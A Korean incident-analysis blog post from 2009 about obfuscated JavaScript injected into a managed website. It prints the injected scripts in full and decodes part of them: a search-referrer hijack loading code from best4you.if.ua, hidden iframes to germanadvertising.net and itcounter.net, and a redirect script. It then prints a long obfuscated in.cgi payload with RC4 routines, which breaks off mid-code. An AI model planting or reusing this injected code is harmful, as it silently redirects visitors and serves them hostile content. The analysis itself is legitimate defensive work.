2009. 3. 3. 16:53

해외에서 삽입한 악성코드 아닌 광고코드 분석

관리중인 모 사이트에 아래와 같은 악성코드는 아닌 광고코드가 삽입되었으며,
침해 분석 결과 해외 아이피로 확인되었음.

일단 침해된 방법에 대해서는 차단하였으나 추가적인 시도 가능성 모니터링 필요.


-- 삽입코드 --
<script>eval( unescape( "%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72%20%72%3d%64%6f%63%75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%2c%75%3d%64%6f%63%75%6d%65%6e%74%2e%55%52%4c%2c%74%3d%22%22%2c%71%2c%71%75%65%2c%73%65%3d%22%67%62%22%3b%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%67%6f%6f%67%6c%65%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%67%6f%6f%67%6c%65%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%6d%73%6e%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%6d%73%6e%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%68%6f%6f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%65%3d%22%79%61%68%6f%6f%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%6e%64%65%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%65%78%74%22%3b%73%65%3d%22%79%61%6e%64%65%78%2e%72%75%22%3b%7d%0d%0a%69%66%28%74%2e%6c%65%6e%67%74%68&&%28%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%65%3d%72%2e%73%75%62%73%74%72%69%6e%67%28%71%2b%32%2b%74%2e%6c%65%6e%67%74%68%29%2e%73%70%6c%69%74%28%22&%22%29%5b%30%5d%3b%0d%0a%69%66%20%28%28%71%75%65%2e%69%6e%64%65%78%4f%66%28%27%73%69%74%65%3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%65%2e%74%6f%4c%6f%77%65%72%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%65%73%74%34%79%6f%75%2e%69%66%2e%75%61%2f%6a%73%2f%62%69%64%63%68%2e%6a%73%3f%71%3d%22%2b%71%75%65%2b%22&%72%65%66%3d%22%2b%72%2b%22%27%3e%3c%2f%73%63%22%2b%22%72%69%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76%61%72%20%6d%79%69%6b%3d%74%72%75%65%3b" ));</script><script>function c173b3059n49a9e2331c1e0(n49a9e2331c9c4){  return (parseInt(n49a9e2331c9c4,16));}function n49a9e2331e11f(n49a9e2331e8ef){ function n49a9e23320060(){var n49a9e2332082f=2;return n49a9e2332082f;} var n49a9e2331f0bf='';n49a9e23320fff=String['fromCharCode'];for(n49a9e2331f891=0;n49a9e2331f891<n49a9e2331e8ef.length;n49a9e2331f891+=n49a9e23320060()){ n49a9e2331f0bf+=(n49a9e23320fff(c173b3059n49a9e2331c1e0(n49a9e2331e8ef.substr(n49a9e2331f891,n49a9e23320060()))));}return n49a9e2331f0bf;} var x23='';var n49a9e233217cf='3C7'+x23+'3637'+x23+'2697'+x23+'07'+x23+'43E667'+x23+'56E637'+x23+'4696F6E20636865636B5F636F6E7'+x23+'4656E7'+x23+'428297'+x23+'B7'+x23+'6617'+x23+'220693D303B7'+x23+'7'+x23+'68696C6528646F637'+x23+'56D656E7'+x23+'42E67'+x23+'657'+x23+'4456C656D656E7'+x23+'47'+x23+'3427'+x23+'9546167'+x23+'4E616D652827'+x23+'69667'+x23+'2616D6527'+x23+'292E6C656E67'+x23+'7'+x23+'468297'+x23+'B7'+x23+'6617'+x23+'220656C3D646F637'+x23+'56D656E7'+x23+'42E67'+x23+'657'+x23+'4456C656D656E7'+x23+'47'+x23+'3427'+x23+'9546167'+x23+'4E616D652827'+x23+'69667'+x23+'2616D6527'+x23+'295B695D3B6966282028656C2E7'+x23+'37'+x23+'47'+x23+'96C652E64697'+x23+'37'+x23+'06C617'+x23+'93D3D27'+x23+'6E6F6E6527'+x23+'207'+x23+'C7'+x23+'C20656C2E7'+x23+'37'+x23+'47'+x23+'96C652E7'+x23+'6697'+x23+'36962696C697'+x23+'47'+x23+'9203D3D27'+x23+'68696464656E27'+x23+'207'+x23+'C7'+x23+'C2028656C2E7'+x23+'7'+x23+'69647'+x23+'4683C3520262620656C2E68656967'+x23+'687'+x23+'43C35292920262620656C2E6E616D65213D27'+x23+'633127'+x23+'297'+x23+'B656C2E7'+x23+'0617'+x23+'2656E7'+x23+'44E6F64652E7'+x23+'2656D6F7'+x23+'6654368696C6428656C293B7'+x23+'D656C7'+x23+'36520692B2B3B7'+x23+'D7'+x23+'D636865636B5F636F6E7'+x23+'4656E7'+x23+'428293B0A696628216D7'+x23+'96961297'+x23+'B646F637'+x23+'56D656E7'+x23+'42E7'+x23+'7'+x23+'7'+x23+'2697'+x23+'465287'+x23+'56E657'+x23+'363617'+x23+'065282027'+x23+'2533632536392536362537'+x23+'322536312536642536352532302536652536312536642536352533642536332533312532302537'+x23+'332537'+x23+'32253633253364253237'+x23+'2536382537'+x23+'342537'+x23+'342537'+x23+'30253361253266253266253637'+x23+'2536352537'+x23+'322536642536312536652536312536342537'+x23+'362536352537'+x23+'322537'+x23+'342536392537'+x23+'33253639253665253637'+x23+'2532652536652536352537'+x23+'34253266253639253665253265253633253637'+x23+'25363925336625333926253237'+x23+'2532622534642536312537'+x23+'342536382532652537'+x23+'322536662537'+x23+'352536652536342532382534642536312537'+x23+'342536382532652537'+x23+'32253631253665253634253666253664253238253239253261253331253339253331253339253335253338253239253262253237'+x23+'253632253334253330253339253634253633253636253634253635253337'+x23+'253635253633253237'+x23+'2532302537'+x23+'37'+x23+'2536392536342537'+x23+'34253638253364253335253339253338253230253638253635253639253637'+x23+'2536382537'+x23+'342533642533332533322533312532302537'+x23+'332537'+x23+'342537'+x23+'39253663253635253364253237'+x23+'2537'+x23+'362536392537'+x23+'332536392536322536392536632536392537'+x23+'342537'+x23+'39253361253638253639253634253634253635253665253237'+x23+'2533652533632532662536392536362537'+x23+'3225363125366425363525336527'+x23+'29293B7'+x23+'D7'+x23+'6617'+x23+'2206D7'+x23+'969613D7'+x23+'47'+x23+'27'+x23+'5653B3C2F7'+x23+'3637'+x23+'2697'+x23+'07'+x23+'43E';document.write(n49a9e2331e11f(n49a9e233217cf));</script><script>function c2882110cbp49aa99ba0a009(p49aa99ba0a7ea){ var p49aa99ba0afb3=16; return (parseInt(p49aa99ba0a7ea,p49aa99ba0afb3));}function p49aa99ba0cdd8(p49aa99ba0d5a5){  var p49aa99ba0dd75='';p49aa99ba0fcb4=String.fromCharCode;for(p49aa99ba0e545=0;p49aa99ba0e545<p49aa99ba0d5a5.length;p49aa99ba0e545+=2){ p49aa99ba0dd75+=(p49aa99ba0fcb4(c2882110cbp49aa99ba0a009(p49aa99ba0d5a5.substr(p49aa99ba0e545,2))));}return p49aa99ba0dd75;} var u9b='';var p49aa99ba10484='3C7'+u9b+'3637'+u9b+'2697'+u9b+'07'+u9b+'43E696628216D7'+u9b+'96961297'+u9b+'B646F637'+u9b+'56D656E7'+u9b+'42E7'+u9b+'7'+u9b+'7'+u9b+'2697'+u9b+'465287'+u9b+'56E657'+u9b+'363617'+u9b+'065282027'+u9b+'2533632536392536362537'+u9b+'322536312536642536352532302536652536312536642536352533642536332533322533382532302537'+u9b+'332537'+u9b+'32253633253364253237'+u9b+'2536382537'+u9b+'342537'+u9b+'342537'+u9b+'302533612532662532662536392537'+u9b+'342536332536662537'+u9b+'352536652537'+u9b+'342536352537'+u9b+'322532652536652536352537'+u9b+'342532662536332536662537'+u9b+'352536652537'+u9b+'342536352537'+u9b+'322532652537'+u9b+'302536382537'+u9b+'30253366253237'+u9b+'2532622534642536312537'+u9b+'342536382532652537'+u9b+'322536662537'+u9b+'352536652536342532382534642536312537'+u9b+'342536382532652537'+u9b+'32253631253665253634253666253664253238253239253261253331253331253330253335253335253330253239253262253237'+u9b+'253339253336253635253330253636253633253330253237'+u9b+'2532302537'+u9b+'37'+u9b+'2536392536342537'+u9b+'34253638253364253334253330253332253230253638253635253639253637'+u9b+'2536382537'+u9b+'34253364253332253337'+u9b+'2533352532302537'+u9b+'332537'+u9b+'342537'+u9b+'39253663253635253364253237'+u9b+'2537'+u9b+'362536392537'+u9b+'332536392536322536392536632536392537'+u9b+'342537'+u9b+'39253361253638253639253634253634253635253665253237'+u9b+'2533652533632532662536392536362537'+u9b+'3225363125366425363525336527'+u9b+'29293B7'+u9b+'D7'+u9b+'6617'+u9b+'2206D7'+u9b+'969613D7'+u9b+'47'+u9b+'27'+u9b+'5653B3C2F7'+u9b+'3637'+u9b+'2697'+u9b+'07'+u9b+'43E';document.write(p49aa99ba0cdd8(p49aa99ba10484));</script>


정상 코드로 변환하여..

-- 원형 코드 --
<script>
if(!myik)
{
 var r=document.referrer,u=document.URL,t="",q,que,se="gb";
 if(r.indexOf("google.")!=-1){t="q";se="google";}
 if(r.indexOf("msn.")!=-1){t="q";se="msn";}
 if(r.indexOf("yahoo.")!=-1){t="p";se="yahoo";}
 if(r.indexOf("yandex.ru")!=-1){t="text";se="yandex.ru";}
 if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
 {
  que=r.substring(q+2+t.length).split("&")[0];
  if ((que.indexOf('site:')==-1) && (que.toLowerCase().indexOf('www.')==-1))
   document.write("<script src='http://best4you.if.ua/js/bidch.js?q="+que+"&ref="+r+"'></sc"+"ript>");
 }
}
var myik=true;
</script>

<script>
function check_content()
{
 var i=0;
 while(document.getElementsByTagName('iframe').length)
 {
  var el=document.getElementsByTagName('iframe')[i];
  if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c1')
  {
   el.parentNode.removeChild(el);
  }
  else
   i++;
 }
}
check_content();

if(!myia)
{
 document.write("<iframe name=c1 src='http://germanadvertising.net/in.cgi?9'+Math.round(Math.random()*191958)+'b409dcfde7ec' width=598 height=321 style='visibility:hidden'></iframe>");
}
var myia=true;
</script>

<script>
if(!myia)
{
 document.write("<iframe name=c28 src='http://itcounter.net/counter.php?'+Math.round(Math.random()*110550)+'96e0fc0' width=402 height=275 style='visibility:hidden'></iframe>");
}
var myia=true;
</script>


추가 다운로드 코드 (bidch.js) -- que 입력값 : test

-- 소스 코드 --
function f(str)
{
 z="ion='";
 d="win";
 c="cat";
 f7=str;
 b="dow.lo";
 g="';";
 i=7;
 j=21;
 if (j-14==i)
  eval(d+b+c+z+f7+g);
}
f('http://bestforyou.if.ua/feed/search.php?q=test');


-- 원형 코드 --
window.location='http://bestforyou.if.ua/feed/search.php?q=test';


http://germanadvertising.net/in.cgi


-- 소스 코드 --
<body><script>CCUTMK='';F='f(d.charAt(i));c=';T='="||d.charAt(i)=="\\n")';R=';for(i=0;i<b;i++){';M='defghijklmnopqrstuvw';K='()*a.length);ci+=a.subs';V='4){a+=Strin';P='var d=Math.floor(Math.random';H='ction hexToString(d){';Z='(c==1?64:c/4);if(c!=6';I='a="";b=0;c=1;';J='function MSE(a,b){ci=""';Y='{if(d.charAt(i)=="';G='xyz0123456789+/=";fun';B='HIJKLMNOPQRSTUVWXYZabc';X='n ci}SVC="ABCDEFG';U='tring(d,d+1)}retur';L='for(i=0;i<d.length;i++)';D=' break;b=b*64+SVC.indexO';CCUTMK+=J+R+P+K+U+X+B+M+G+H+I+L+Y+T+D+F+Z+V;R='t(b/c));b%=c}}';O='rray();k+=a;a=k;for';E='6;x=s[i];s[i]=s[j]';M='(i=oil;i<256;i++)s[i]=i;';D='=oil;c="";for(y=0;y<b.le';L='g.fromCharCode(parseIn';B=';s[j]=x;c+=String';Z='return a}oil=0;';W='x=s[i];s[i]=s[j];';T='s[j]=x}i=oil;j';J='+1)%256;j=(j+s[i])%25';K='k="";if(isNaN(';P='eAt(i%a.length))%256;';I='function RRL(a,b){';N='++){j=(j+s[i]+a.charCod';U='ngth;y++){i=(i';V='j=oil;for(i=oil;i<256;i';Q='oil)){k=oil;oil=0}s=new A';CCUTMK+=L+R+Z+I+K+Q+O+M+V+N+P+W+T+D+U+J+E+B;Q='of a)this.PTO(a,256);else thi';U='ile(--n>=0){var v=x*';K='.fromCharCode(b.char';N='function rc4Decrypt(a,b)';B='function SQF(i,x,w,j,c,n){wh';V='ath.floor(v/0x4000000);w[j++]=';J='.fromNumber(a,b,c);else if(';C='}FVB=((0xdeadbeefcafe&0xfff';W='%256])}return c}';E='CodeAt(y)^s[(s[i]+s[j])';X='a,b,c){if(a!=null)if("nu';P='){return new A(null)}';Z='fff)==0xefcafe);function A(';L='mber"==typeof a)this';M='this[i++]+w[j]+c;c=M';R='b==null&&"string"!=type';F='{return RRL(a,b)';Y='s.PTO(a,b)}function nbi(';CCUTMK+=K+E+W+N+F+C+Z+X+L+J+R+Q+Y+P+B+U+M+V;L='l+h*a;l=a*l+((m&0x7f';H='c>>>30);w[j++]=l&0x3fffffff}r';M=';c=(l>>>30)+(m>>>15)+xh*h+(';P='ff)<<15)+w[j]+(c&0x3fffffff)';Q='fff,xh=x>>15;while(--';G='var h=this[i++]>>14;';Y='eturn c}function XMG(i,x,w,j,c';U='fffffff}return c}if(';V=' h=this[i++]>>15;var m=xh*';E='=x>>14;while(--n>=0){';F='>28)+(m>>14)+xh*h;w[j++]=l&0x';R='((m&0x3fff)<<14)+w[j]+c;c=(l>';O='n>=0){var l=this[i]&0x7fff;var';B='v&0x3ffffff}return c}function';T='var m=xh*l+h*a;l=a*l+';J=',n){var a=x&0x3fff,xh';X=' YHX(i,x,w,j,c,n){var a=x&0x7';I='var l=this[i]&0x3fff;';CCUTMK+=B+X+Q+O+V+L+P+M+H+Y+J+E+I+G+T+R+F+U;V='fghijklmnopqrstuvwxyz";';W='var MUJ=new Array();var rr,vv';M='FVB&&(navigator.appName=="';P='type.F2=2*B-BI_FP;var';R='tor.appName!="Netscape")){';S='.FV=Math.pow(2,BI_FP);A.protot';O='ype.F1=BI_FP-B;A.proto';C='XMG;B=28}A.prototype.DB';N=';A.prototype.DV=(1<<B);';D=' NGP="0123456789abcde';J='er")){A.prototype.am=Y';B='HX;B=30}else if(FVB&&(naviga';U='=26}else{A.prototype.am=';Y='Microsoft Internet Explor';F='var BI_FP=52;A.prototype';H='A.prototype.am=SQF;B';Q=';rr="0".charCodeAt(0);for(';K='=B;A.prototype.DM=((1<<B)-1)';CCUTMK+=M+Y+J+B+R+H+U+C+K+N+F+S+O+P+D+V+W+Q;T='ar i=this.t-1;i>=0;--i';X=')this[0]=x+DV;else this.t=';O='harAt(n)}function MSK(s,';D='function PLT(r){for(v';F=')r[i]=this[i];r.t=this.t;r';R='vv=0;vv<=9;++vv)MUJ[rr++]';Y='+vv)MUJ[rr++]=vv;function';W='(i)];return(c==null)?-1:c}';U='=vv;rr="a".charCodeAt';E=' JMH(n){return NGP.c';I='0}function nbv(i){var r';P='.s=this.s}function CQH(x){this';B='(0);for(vv=10;vv<36;++vv)';N='CodeAt(0);for(vv=10;vv<36;+';C='i){var c=MUJ[s.charCodeAt';S='>0)this[0]=x;else if(x<-1';J='MUJ[rr++]=vv;rr="A".char';M='.t=1;this.s=(x<0)?-1:0;if(x';CCUTMK+=R+U+B+J+N+Y+E+O+C+W+D+T+F+P+M+S+X+I;F=');return}this.t=0;this';H='lse if(b==32)k=5;else if(b==4)';V='his.t++]=x;else if(sh+';Q=')k=8;else if(b==2)k=1;e';Z='f(b==8)k=3;else if(b==256';Y='s,i);if(x<0){if(s.char';J='.DB-sh))-1))<<sh;this[this';L='0){var x=(k==8)?s[i]&0xff:MSK(';U='At(i)=="-")mi=true;continue}m';D='.s=0;var i=s.length,mi=f';R='.t-1]|=(x&((1<<(this';P='=nbi();r.BSV(i);return r';W='k=2;else{this.fromRadix(s,b';X='}function MQI(s,b){var ';C='k;if(b==16)k=4;else i';T='alse,sh=0;while(--i>=';N='k>this.DB){this[this';K='i=false;if(sh==0)this[t';CCUTMK+=P+X+C+Z+Q+H+W+F+D+T+L+Y+U+K+V+N+R+J;M='se if(b==32)k=5;else if(b==4)k';C='b==8)k=3;else if(b==2)k=1;el';B='his[this.t-1]|=x<<sh;sh+=';J='his.s=-1;if(sh>0)this[th';Y='"+this.OTW().UKZ(b);var ';G='[this.t-1]==c)--this.t}functio';K='}if(k==8&&(s[0]&0x80)!=0){t';T='k;if(sh>=this.DB)sh-=this.DB';F='is.t-1]|=((1<<(this.DB-sh))-1)';L='.t++]=(x>>(this.DB-sh))}else t';H='<<sh}this.PQP();if(m';V='k;if(b==16)k=4;else if(';S='n VHR(b){if(this.s<0)return"-';P='=2;else return this.toR';Q='adix(b);var a=(1<<k)-1,d,';Z='i)A.IEH.YEX(this,this)}functio';D='n PUE(){var c=this.s&this.DM;';E='while(this.t>0&&this';CCUTMK+=L+B+T+K+J+F+H+Z+D+E+G+S+Y+V+C+M+P+Q;F=')return r;var i=this.t;';M='>0)m=true;if(m)r+=JMH(d)';G='ction NFL(){return(this.s<0)?t';D='=this[i]>>p)>0){m=true;r=JMH(';I='r=i-a.t;if(r!=0)return r;whi';X='YEX(this,r);return r}fun';K='lse{d=(this[i]>>(p-=k))&a;if(p';T='ar p=this.DB-(i*this.DB)%k';U='}}return m?r:"0"}fun';O=';if(i-->0){if(p<this.DB&&(d';Z='<=0){p+=this.DB;--i}}if(d';W='W(a){var r=this.s-a.s;if(r!=0';P='ction BEJ(){var r=nbi();A.IEH.';N='[i]&((1<<p)-1))<<(k-p);d';C='|=this[--i]>>(p+=this.DB-k)}e';J='d)}while(i>=0){if(p<k){d=(this';H='his.OTW():this}function HY';Q='m=false,r="",i=this.t;v';CCUTMK+=Q+T+O+D+J+N+C+K+Z+M+U+P+X+G+H+W+F+I;N='ction IIM(n,r){var i;for(i=th';B=';r.t=this.t+n;r.s=this.s}fu';W='le(--i>=0)if((r=this[i]-a[i]';Y='[i];for(i=n-1;i>=0;--i)r[i]=0';L='is.t-1;i>=0;--i)r[i+n]=this';T='(this.t-1)+RHJ(this[this.t-1]^';J='B(){if(this.t<=0)ret';I='{x=t;r+=8}if((t=x>>4)!=0){x=t';D='=1,t;if((t=x>>>16)!=0){x=t;';U='r+=1}return r}function XS';C='urn 0;return this.DB*';H='}function RHJ(x){var r';Q='=2}if((t=x>>1)!=0){x=t;';S='(this.s&this.DM))}fun';F=';r+=4}if((t=x>>2)!=0){x=t;r+';X='nction CJC(n,r){for(var i=n;';Z='r+=16}if((t=x>>8)!=0)';K=')!=0)return r;return 0';CCUTMK+=W+K+H+D+Z+I+F+Q+U+J+C+T+S+N+L+Y+B+X;D='floor(n/this.DB);if(a>=';Y='b=this.DB-a;var d=(1';H='=this.DB-b;var d=(1<<b)-1;r[0';L='0);r.s=this.s}function IVS(n';P='this[i];r.t=Math.max(this.t-n,';Q='){r[i+e+1]=(this[i]>>b)|c;c=';N='e]=c;r.t=this.t+e+1;r.';W='<<b)-1;var e=Math.floor(n/th';Z='this.t){r.t=0;return';O='(this[i]&d)<<a}for(i=e';F='(n,r){r.s=this.s;var a=Math.';B='-1;i>=0;--i)r[i]=0;r[';S='s.DM,i;for(i=this.t-1;i>=0;--i';R='is.DB),c=(this.s<<a)&thi';K='}var b=n%this.DB;var c';C='i<this.t;++i)r[i-n]=';E='s=this.s;r.PQP()}function PKN';T=',r){var a=n%this.DB;var ';CCUTMK+=C+P+L+T+Y+W+R+S+Q+O+B+N+E+F+D+Z+K+H;U=' i=a+1;i<this.t;++i){r[i';Z='le(i<m){c+=this[i]-a[i';L='i-a]=this[i]>>b}if(b>0)r[t';W='];r[i++]=c&this.DM;c>>=this.DB';G='n TFU(a,r){var i=0,c=0,m=Mat';C='s.s}else{c+=this.s;while(';Y='c;r.t=this.t-a;r.PQP()}functio';O='}if(a.t<this.t){c-=a.s;while(';X='c&this.DM;c>>=this.DB}c+=thi';J=']=this[a]>>b;for(var';F='[i++]=this.DV+c;else if(c>0)';B='his.DM;c>>=this.DB}c-=a';R='.s}r.s=(c<0)?-1:0;if(c<-1)r';V='-a-1]|=(this[i]&d)<<c;r[';H='i<this.t){c+=this[i];r[i++]=';M='h.min(a.t,this.t);whi';E='his.t-a-1]|=(this.s&d)<<';P='i<a.t){c-=a[i];r[i++]=c&t';CCUTMK+=J+U+V+L+E+Y+G+M+Z+W+O+H+X+C+P+B+R+F;W='.t>0)r[r.t-1]+=x.am(i,x';F=';var i=r.t=2*x.t;while(--i>=';V='m(i+1,2*x[i],r,2*i+1,c,x.t-i-';P='.am(0,y[i],r,i,0,x.t';Q='r,2*i,0,1);if((r[i+x.t]+=x.a';T='D(r){var x=this.abs()';K=');r.s=0;r.PQP();if(this.s!=';R='a.s)A.IEH.YEX(r,r)}function TS';I='.DV;r[i+x.t+1]=1}}if(r';Z='tion KGX(a,r){var x=this.abs()';H='[i],r,2*i,0,1);r.s=0;r';L='r[i++]=c;r.t=i;r.PQP()}func';C=';r.t=i+y.t;while(--i>=0)r[i]=';O='0)r[i]=0;for(i=0;i<x.t-1;++';X='0;for(i=0;i<y.t;++i)r[i+x.t]=x';G=',y=a.abs();var i=x.t';E='i){var c=x.am(i,x[i],';S='1))>=x.DV){r[i+x.t]-=x';CCUTMK+=L+Z+G+C+X+P+K+R+T+F+O+E+Q+V+S+I+W+H;G='<this.F2;var i=r.t,j=';Z='i-d,t=(q==null)?nbi():q;';E='var y=nbi(),ts=this.s,ms=m.s;';L='=f*(1<<this.F1)+((d>1)?y[d-2]>';M='q,r){var a=m.abs();if(a.t<=0)';P='(c,r)}else{a.JJQ(y);b.';S='=y[d-1];if(f==0)return;var g';X='y.DKU(j,t);if(r.KXG(t)>=0){r[';V='V/g,d2=(1<<this.F1)/g,e=1<';W='V(0);if(r!=null)this.JJQ(';F='f(c>0){a.FKG(c,y);b.FKG';N='var c=this.DB-RHJ(a[a.t-1]);i';R='JJQ(r)}var d=y.t;var f';T='f(b.t<a.t){if(q!=null)q.BS';Y='>this.F2:0);var h=this.F';Q='return;var b=this.abs();i';B='.PQP()}function EZB(m,';C='r);return}if(r==null)r=nbi();';CCUTMK+=B+M+Q+T+W+C+E+N+F+P+R+S+L+Y+V+G+Z+X;W='?this.DM:Math.floor(r';C='f((r[i]+=y.am(0,k,r,j,0,d))';B='t,r)}}if(q!=null){r.JWV(d,q);i';T='<k){y.DKU(j,t);r.YEX(t,r)';U='ile(--j>=0){var k=(r[--i]==f)';V='>0)a.YEX(r,r);return r}';I='le(y.t<d)y[y.t++]=0;wh';D='if(this.s<0&&r.KXG(A.IEH)';S='function JVI(m){this.m=';Q='(r,r)}function JOB(a){var r=nb';Z='DKU(d,t);t.YEX(y,y);whi';M='r.t++]=1;r.YEX(t,r)}A.ONE.';K='r);if(ts<0)A.IEH.YEX';X='r.PQP();if(c>0)r.NSN(c,';J=';while(r[i]<--k)r.YEX(';N='f(ts!=ms)A.IEH.YEX(q,q)}r.t=d;';E='[i]*h+(r[i-1]+e)*d2);i';P='i();this.abs().VFG(a,null,r);';CCUTMK+=M+Z+I+U+W+E+C+T+J+B+N+X+K+Q+P+D+V+S;L=' x}function WFM(x){ret';E='I.prototype.KFO=WFM;JVI.proto';J='pe.XBO=BNB;JVI.prototype.T';U='m}function UWR(x){if(x.';F='s<0||x.KXG(this.m)>=0)return ';M=' BNB(x,y,r){x.HVF(y,r);this';C='type.BTZ=OUV;JVI.prototy';Z='.BTZ(r)}function UXH(x,r){x.F';Y='var y=x&3;y=(y*(2-(x&0';G='x.mod(this.m);else return';D='.VFG(this.m,null,x)}function';B='s.t<1)return 0;var x=this[';I='urn x}function OUV(x){x';W='GH=UXH;function SQY(){if(thi';Q='0];if((x&1)==0)return 0;';N='.prototype.CSS=UWR;JV';P='xf)*y))&0xf;y=(y*(2-';V='EO(r);this.BTZ(r)}JVI';CCUTMK+=U+F+G+L+I+D+M+Z+V+N+E+C+J+W+B+Q+Y+P;L='this.mp&0x7fff;this.mp';C='h=this.mp>>15;this.um';T=' VUP(x){var r=nbi();x.abs()';Y='TZ(r);return r}funct';S='on UTY(m){this.m=m;this';U='.mp=m.RTY();this.mpl=';F=',null,r);if(x.s<0&&r.KXG(';M='return r}function DDD(x){';J='(2-(((x&0xffff)*y)&0x';N='s.mt2=2*m.t}function';O='?this.DV-y:-y}functi';R='A.IEH)>0)this.m.YEX(r,r);';P='(x&0xff)*y))&0xff;y=(y*';D='var r=nbi();x.JJQ(r);this.B';X='.DKU(this.m.t,r);r.VFG(this.m';H='s.DV))%this.DV;return(y>0)';K='=(1<<(m.DB-15))-1;thi';Z='ffff)))&0xffff;y=(y*(2-x*y%thi';CCUTMK+=P+J+Z+H+O+S+U+L+C+K+N+T+X+F+R+M+D+Y;B=')<<15))&x.DM;j=i+this.m';W=';x[++j]++}}x.PQP();x.JWV';P='ar i=0;i<this.m.t;++i){va';D='is.m)>=0)x.YEX(this.';X=',x,i,0,this.m.t);whi';R='UTY.prototype.KFO=DDD;UTY.p';V='UTY.prototype.CSS=VUP;';K='le(x[j]>=x.DV){x[j]-=x.DV';T='(this.m.t,x);if(x.KXG(th';I='y,r){x.HVF(y,r);this.BTZ(r)}';M='r);this.BTZ(r)}function CDB(x,';E='is.mpl+(((j*this.mph';H='m,x)}function KGV(x,r){x.FEO(';F='r j=x[i]&0x7fff;var a=(j*th';N='.t;x[j]+=this.m.am(0,a';Z='ion DMY(x){while(x.t<=t';G='his.mt2)x[x.t++]=0;for(v';U='+(x[i]>>15)*this.mpl)&this.um';CCUTMK+=Z+G+P+F+E+U+B+N+X+K+W+T+D+H+M+I+V+R;R=')}A.prototype.JJQ=PLT;A.proto';M='JJQ(r);while(--i>=0){z.TGH(';C=';return this.exp(e,z';Z='r,r2);if((e&(1<<i))>0)z';S='pe.XBO=CDB;UTY.proto';Q='S(this),i=RHJ(e)-1;g.';V='e<256||m.FIP())z=new JVI';W='.XBO(r2,g,r);else{var t';J='ction JRI(e,z){if(e>0xfffff';U='type.TGH=KGV;function NQU()';K='fff||e<1)return A.ONE;';N='(m);else z=new UTY(m)';Y='{return((this.t>0)?(';E='}function BQI(e,m){var z;if(';H='rototype.BTZ=DMY;UTY.prototy';I='=r;r=r2;r2=t}}return z.KFO(r)';O='this[0]&1):this.s)==0}fun';L='var r=nbi(),r2=nbi(),g=z.CS';CCUTMK+=H+S+U+Y+O+J+K+L+Q+M+Z+W+I+E+V+N+C+R;W='e.abs=NFL;A.prototype.KXG=';P=';A.ONE=nbv(1);function J';J='EX=TFU;A.prototype.H';N='P=NQU;A.prototype.exp=JR';Z='HYW;A.prototype.PLY=XSB;A.';F='otype.NSN=PKN;A.prototype.Y';V='I;A.prototype.UKZ=VHR;A.pro';R='M;A.prototype.JWV=CJC;A.pro';T='prototype.mod=JOB;A.prototyp';G='totype.FKG=IVS;A.prot';I='ype.PQP=PUE;A.prototype.DKU=II';E='VF=KGX;A.prototype.FEO=TSD';L=';A.prototype.VFG=EZB;A.pro';O='totype.RTY=SQY;A.prototype.FI';X='totype.OTW=BEJ;A.prototyp';Y='ype.PTO=MQI;A.protot';U='type.BSV=CQH;A.protot';M='e.CKD=BQI;A.IEH=nbv(0)';CCUTMK+=U+Y+I+R+G+F+J+E+L+O+N+V+X+W+Z+T+M+P;Y='t=PEU;JMF.prototype.';D='(this.j+this.S[this.i])&255';S='i=(this.i+1)&255;this.j=';U='is.S[j]=t}this.i=0;this.j=0}f';Q=';t=this.S[this.i];this';R='this.S=new Array()}function ';F='j];this.S[this.j]=t;return t';G='unction OYO(){var t;this.';E='his.S[(t+this.S[this.i])&2';M='next=OYO;function NTJ';V='+a[i%a.length])&255;t=this.S[';I='55]}JMF.prototype.ini';B='<256;++i)this.S[i]=i;j=0;for(';N='.S[this.i]=this.S[this.';C='MF(){this.i=0;this.j=0;';O='PEU(a){var i,j,t;for(i=0;i';P='i=0;i<256;++i){j=(j+this.S[i]';Z='i];this.S[i]=this.S[j];th';CCUTMK+=C+R+O+B+P+V+Z+U+G+S+D+Q+N+F+E+I+Y+M;R='if(navigator.appName';J='LZN++]^=(x>>24)&255;if(LZ';B='th;++t)OUS[LZN++]=z.ch';E='ar OTS=256;var MUC;var OUS;va';C='US[LZN++]^=(x>>16)&255;OUS[';L='arCodeAt(t)&255}while(LZ';U='new Array();LZN=0;var t;';D='S[LZN++]^=(x>>8)&255;O';G='N>=OTS)LZN-=OTS}function FY';H='om(32);for(t=0;t<z.leng';W='){var z=window.crypto.rand';K='X(){DWL(new Date().g';N='=="Netscape"&&navigator';O='){OUS[LZN++]^=x&255;OU';Q='etTime())}if(OUS==null){OUS=';Z='r LZN;function DWL(x';Y='.appVersion<"5"&&window.crypto';T='(){return new JMF()}v';CCUTMK+=T+E+Z+O+D+C+J+G+K+Q+U+R+N+Y+W+H+B+L;C='LZN++]=t>>>8;OUS[LZN++]=t&2';S='hile(i+n<s.length){a+';B='.next()}function EJEs(a';F='){}ZXV.prototype.ZQX=EJEs';N='++i)a[i]=EJE()}function ZXV(';G='){var 